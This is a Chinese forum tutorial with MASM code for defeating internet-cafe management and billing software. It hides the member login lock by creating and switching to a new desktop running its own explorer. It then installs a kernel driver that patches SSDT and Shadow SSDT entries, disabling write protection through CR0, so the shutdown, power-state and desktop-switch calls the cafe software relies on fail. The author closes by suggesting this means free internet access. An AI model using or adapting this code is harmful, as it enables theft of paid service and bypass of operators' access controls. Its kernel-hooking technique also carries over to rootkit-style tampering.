网管软件玩隐身,API巧破网管软件 (驱动版)
----写给曾经的黑防 hccker0058(nohacks) 一.寻寻觅觅,开始前的可行性分析
网管类程序锁定电脑的时候,都会有一个会员登陆窗口,我们一般的思路是结束它的进程,即Kill,但是我们有没有想过,还有没有别的什么办法?况且这样阻断了网管程序与服务器的通讯,网管也会发现的,再说,如果我们碰到了像病毒一样的网管程序怎么也Kill不掉该怎么办了?
咦,有办法了!大家都知道老板键吧,当Office中老板独特的嗓音(脚步声,呼吸声)响起之时,手无寸铁的白领MM一瞬间一键隐藏了自己正在浏览的网站界面和应用程序界面......隐藏窗口也就是本文的思路--隐藏网吧管理软件的客户端会员登陆窗口! 二.先知后行
要实现隐藏窗口的目地可以借助WindowsAPI涵数,目前我所知道的有2种方法:
1.通过API涵数ShowWindow直接隐藏网管软件的窗口。
2.通过创建一个虚拟桌面,达到另类隐藏的目的。
本文主要讲第二种方法:创建虚拟桌面,主要流程如下:通过CreateDesktop创建一个虚拟桌面,SetThreadDesktop设置线程桌面,SwitchDesktop切换桌面,不用时用CloseDesktop关闭桌面。
新建桌面并没有帮我们加载外壳explorer.exe,需要我们手动加载,可以用CreateProcess来创建。
函数原型:
BOOL CreateProcess
(
LPCTSTR lpApplicationName,
LPTSTR lpCommandLine,
LPSECURITY_ATTRIBUTES lpProcessAttributes。
LPSECURITY_ATTRIBUTES lpThreadAttributes,
BOOL bInheritHandles,
DWORD dwCreationFlags,
LPVOID lpEnvironment,
LPCTSTR lpCurrentDirectory,
LPSTARTUPINFO lpStartupInfo,
LPPROCESS_INFORMATION lpProcessInformation
)
有10个参数,其实我们特别要注意的只是倒数第二个参数lpStartupInfo,它指向一个用于决定新进程的主窗体如何显示的STARTUPINFO结构体
STARTUPINFO.lpDesktop 就是设置运行的桌面,提供桌面标示即可,和CreateDesktop的第一个参数相同。
下面是一段MASM的代码,就是用来在新桌面加载外壳的。
StartMyExplore proc LOCAL sui:STARTUPINFO
LOCAL pi:PROCESS_INFORMATION
;invoke RtlZeroMemory,addr sui,SIZEOF STARTUPINFO
mov sui.cb,SIZEOF STARTUPINFO
mov sui.lpDesktop,offset IdDesktop
invoke CreateProcess,NULL,CTEXT("explorer"),NULL,NULL,TRUE,CREATE_DEFAULT_ERROR_MODE or
CREATE_SEPARATE_WOW_VDM,NULL,NULL,addr sui,addr pi
ret
StartMyExplore endp
到这里,我们的新桌面算是可以正常工作了,网管软件在旧桌面,它不会影响我们的新桌面,这样网管软件的锁定对我们无效了。
解决了锁定的问题,我们在来看关机的问题,因为网管软件在锁定一段时间内没有人解锁会自动关机的。
在ring3下关机一般是通过调用ExitWindowsEx来实现的,我们在RING3下挂钩这个函数也可以实现拦截关机,但是可能只对一般的程序有效,现在的计费软件会直接调用内核函数暴力关机,因此我们需要挂钩内核函数。
在WINXP里正常关机最终会调用内核函数NtUserCallOneParam,而在32位 Win7下会调用内核函数NtUserCallNoParam,一般情况下,我们HOOK这2个函数就可以阻止关机。
另外NtInitiatePowerAction和NtSetSystemPowerState这2个SSDT函数也可以实现关机,我们也要照顾到。 new_NtInitiatePowerAction proc SystemAction,MinSystemState,Flags, Asynchronous
; .if SystemAction==PowerActionShutdown || SystemAction==PowerActionShutdownReset
;
; mov eax,STATUS_UNSUCCESSFUL
;
; ret
;
; .endif
;
; push Asynchronous
; push Flags
; push MinSystemState
; push SystemAction
; call old_NtInitiatePowerAction
; ret
mov eax,STATUS_UNSUCCESSFUL
ret
new_NtInitiatePowerAction endp
new_NtSetSystemPowerState proc SystemAction,MinSystemState,Flags
; .if SystemAction==PowerActionShutdown || SystemAction==PowerActionShutdownReset
;
; mov eax,STATUS_UNSUCCESSFUL
;
; ret
;
; .endif
;
; push Flags
; push MinSystemState
; push SystemAction
; call old_NtSetSystemPowerState
; ret
mov eax,STATUS_UNSUCCESSFUL
ret
new_NtSetSystemPowerState endp
上面的代码,直接让它返回STATUS_UNSUCCESSFUL,使其调用失败。
另外,有些网管程序可能会检查当前桌面并会切换回原桌面,我们还需要挂钩
NtUserSwitchDesktop: new_NtUserSwitchDesktop PROC hDesktop mov eax,STATUS_UNSUCCESSFUL
ret
new_NtUserSwitchDesktop endp
但这样后,为了使我们的应用层也能使用SwitchDesktop,我们可以通过ControlDriver给驱动程序发送
SwitchDesktop需要的参数,然后在驱动DispatchControl例程里直接调用原函数:
;应用程需要切换桌面
.elseif dwIoControlCode==IOCTL_CODE(802h)
mov eax,pSystemBuffer
push dword ptr[eax]
call old_NtUserSwitchDesktop
mov eax, STATUS_SUCCESS 为了实现拦截切换桌面,关机的目的,我们需要挂钩5个函数:NtUserSwitchDesktop,NtUserCallOneParam,
NtUserCallNoParam,NtSetSystemPowerState,NtSetSystemPowerState.
那么如何挂钩呢?那要从系统服务描述符表说起。
SSDT(System Services Descriptor Table),系统服务描述符表。这个表就是一个把ring3的Win32 API和ring0的内核API联系起来。SSDT并不仅仅只包含一个庞大的地址索引表,它还包含着一些其它有用的信息,诸如地址索引的基地址、服务函数个数等。
通过修改此表的函数地址可以对常用windows函数及API进行hook,从而实现对一些关心的系统动作进行过滤、监控的目的。一些HIPS、防毒软件、系统监控、注册表监控软件往往会采用此接口来实现自己的监控模块,
SSDT到底是什么呢?打一个比方,SSDT相当于系统内部API的指向标,作用就是告诉系统,需要调用的API在什么地方。
;服务表结构
SYSTEM_SERVICE_TABLE struct
ServiceTableBase dd ? ;这里是组入口指针
ServiceCounterTableBase dd ? ;此处是调用次数计数数组
NumberOfServices dd ? ;服务入口的个数
ParamTableBase dd ? ;服务参数字节数的数组
SYSTEM_SERVICE_TABLE ends
PSYSTEM_SERVICE_TABLE typedef PTR SYSTEM_SERVICE_TABLE
;SSDT&&SSSDT表结构
SYSTEM_DESCRIPTOR_TABLE struct
ntoskrnl SYSTEM_SERVICE_TABLE <> ;ntoskrnl.exe (native api)
win32k SYSTEM_SERVICE_TABLE <> ;win32k.sys (gdi/user)
Table3 SYSTEM_SERVICE_TABLE <> ;not used
Table4 SYSTEM_SERVICE_TABLE <> ;not used
SYSTEM_DESCRIPTOR_TABLE ends
PSYSTEM_DESCRIPTOR_TABLE typedef PTR PSYSTEM_DESCRIPTOR_TABLE
内核中存在两个系统服务描述符表,一个是KeServiceDescriptorTable(由ntoskrnl.exe导出),一个是KeServieDescriptorTableShadow
(没有导出)。
很不幸的是,我们要HOOK的这2个函数都在KeServieDescriptorTableShadow,属于SSSDT函数,值得庆贺的是我们可以通过KTHREAD.ServiceTable搜索得
到SSSDT基址,代码比较长,这里就不贴了,大家可以看附件代码。
得到SSSDT的基址后,我们通过服务号很容易定位到存函数指针存储地址,我们就可以修改存储地址的内容来个达到HOOK的目的。
和ring3的HOOK一样,这些内容默认是不可写的,我们可以操作cr0寄存器来修改写保护,代码如下:
;***************************************************************************
; 根据给出的服务序号和替代服务地址修改ssdt表,返回值为原服务地址
;***************************************************************************
EditSSDT proc uses ebx ecx lpbase:dword ,dwIndex:dword,lpNowProc:dword
invoke MmIsAddressValid,lpNowProc ;检查地址是否有效
.if al== FALSE
;invoke DbgPrint, $CTA0("无效地址:%8X\n"),lpNowProc
mov eax,FALSE
ret
.endif
mov ecx, dwIndex
mov eax, lpbase ;SYSTEM_SERVICE_TABLE .if ecx>[eax+8] ;判断服务序号是否超出服务总数
mov eax,FALSE
ret
.endif
mov eax,[eax] ;SSDT的指针
mov ebx,[eax+ecx*4] ;原地址
.if lpNowProc==ebx ;原地址和要修改的地址相同,代表已经修改,直接返回假
mov eax,FALSE
ret
.endif
push ebx ;入栈,保存原来的ServerBase
lea ecx,[eax+ecx*4] ;取序号地址 也就是 mov ecx,eax+ecx*4 push ecx ;保护ecx, MmIsAddressValid函数会修改ECX的值
invoke MmIsAddressValid,[ecx] ;检查地址是否有效
pop ecx
.if al== FALSE
pop eax ;恢复堆栈
;invoke DbgPrint, $CTA0("无效地址:%8X\n"),ecx
mov eax,FALSE
ret
.endif ;去掉写保护
push eax
cli
mov eax, cr0
and eax, not 10000h
mov cr0, eax
pop eax ;修改 SSDT
push lpNowProc
pop dword ptr[ecx]
;恢复写保护
push eax
mov eax, cr0
or eax, 10000h
mov cr0, eax
sti
pop eax
pop eax ;出栈,返回值为原服务地址
ret
EditSSDT endp
调用很简单:
invoke EditSSDT,SSSDT, NtUserCallNoParam_callnumber,offset new_NtUserCallNoParam
.if eax
mov old_NtUserCallNoParam,eax
.endif
在驱动初始时,我们就需要获取SSDT表基地址及SSSDT表基地址,然后判断系统来设置函数服务号,还有一些其他工作:
InitHook proc
;HOOK SSSDT 必须在GUI线程上下文操作才有效,DispatchControl 操作会加载win32k.sys,加载win32k.sys后,系统导出的
KeServiceDescriptorTable表会失效
;这时HOOK SSDK 直接用找到的SSSDT基址即可,SSSDT表在第二个数组。
;取SSDT表基地址
invoke GetServiceDescriptorTableShadowAddress
mov SSDT,eax
;取SSSDT表基地址(win32.sys)
add eax,size SYSTEM_SERVICE_TABLE
mov SSSDT,eax
invoke DbgPrint,$CTA0("SSSDT BASE: %8X\n"),eax
;取系统版本
invoke GetWindowsVersion
mov WINDOWS_VERSION,eax ;只确定WINXP和WIN7的SSSDT序号是正确的,其他系统请修改。
.if eax==WINDOWS_VERSION_2K mov NtUserCallNoParam_callnumber,142h
mov NtUserCallOneParam_callnumber,143h mov Rcode,38h
ret .elseif eax==WINDOWS_VERSION_XP || eax==WINDOWS_VERSION_2K3 mov NtUserCallNoParam_callnumber,142h
mov NtUserCallOneParam_callnumber,143h
mov NtInitiatePowerAction_callnumber ,93
mov NtSetSystemPowerState_callnumber ,241
mov NtUserSwitchDesktop_callnumber,558
mov Rcode,34h
ret
.else
mov NtUserCallNoParam_callnumber,14dh
mov NtUserCallOneParam_callnumber,14eh
mov NtInitiatePowerAction_callnumber ,150
mov NtSetSystemPowerState_callnumber ,351
mov NtUserSwitchDesktop_callnumber,594
mov Rcode,10h
ret
.endif ret
InitHook endp
初始后,我们就可以进行挂钩了,要注意的是SSSDT表只有在GUI线程才有加载,非GUI线程访问会蓝屏,有2种方法解决这个问题:
1. 附加一个GUI进程
2. 用户层通过ControlDriver与驱动交互时执行。
本文采用的第二种方法:
.if dwIoControlCode==IOCTL_CODE(800h) ;IOCTL_GET_HOOK invoke StartHook
mov eax, STATUS_SUCCESS .elseif dwIoControlCode==IOCTL_CODE(801h) ;IOCTL_GET_UnHOOK
invoke StopHook
mov eax, STATUS_SUCCESS
开始挂钩: StartHook proc
;SSDT层禁止关机重启 invoke EditSSDT,SSDT,SYSCALL_INDEX(ZwInitiatePowerAction ),offset new_NtInitiatePowerAction
.if eax
mov old_NtInitiatePowerAction,eax
.endif
; invoke DbgPrint,$CTA0("SSSDT BASE: %8X\n"),SYSCALL_INDEX(ZwSetSystemPowerState)
invoke EditSSDT,SSDT, NtSetSystemPowerState_callnumber,offset new_NtSetSystemPowerState
.if eax
mov old_NtSetSystemPowerState,eax
.endif
;
;禁止切换桌面
invoke EditSSDT,SSSDT, NtUserSwitchDesktop_callnumber,offset new_NtUserSwitchDesktop
.if eax
mov old_NtUserSwitchDesktop,eax
.endif
;
; ;SSSDT层禁止关机/重启/注销 .if WINDOWS_VERSION==WINDOWS_VERSION_XP || WINDOWS_VERSION==WINDOWS_VERSION_2K ||
WINDOWS_VERSION==WINDOWS_VERSION_2K3
invoke EditSSDT,SSSDT, NtUserCallOneParam_callnumber,offset new_NtUserCallOneParam
.if eax
mov old_NtUserCallOneParam,eax
.endif .else
invoke EditSSDT,SSSDT, NtUserCallNoParam_callnumber,offset new_NtUserCallNoParam
.if eax
mov old_NtUserCallNoParam,eax
.endif .endif
ret
StartHook endp
OK,主要流程就是这样了,现在计费软件锁定对我们无效,关机被我们拦截,这样是不是意味着免费上网?呵呵。
我的博客:http://nohacks.cn 欢迎来踩
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
上传的附件: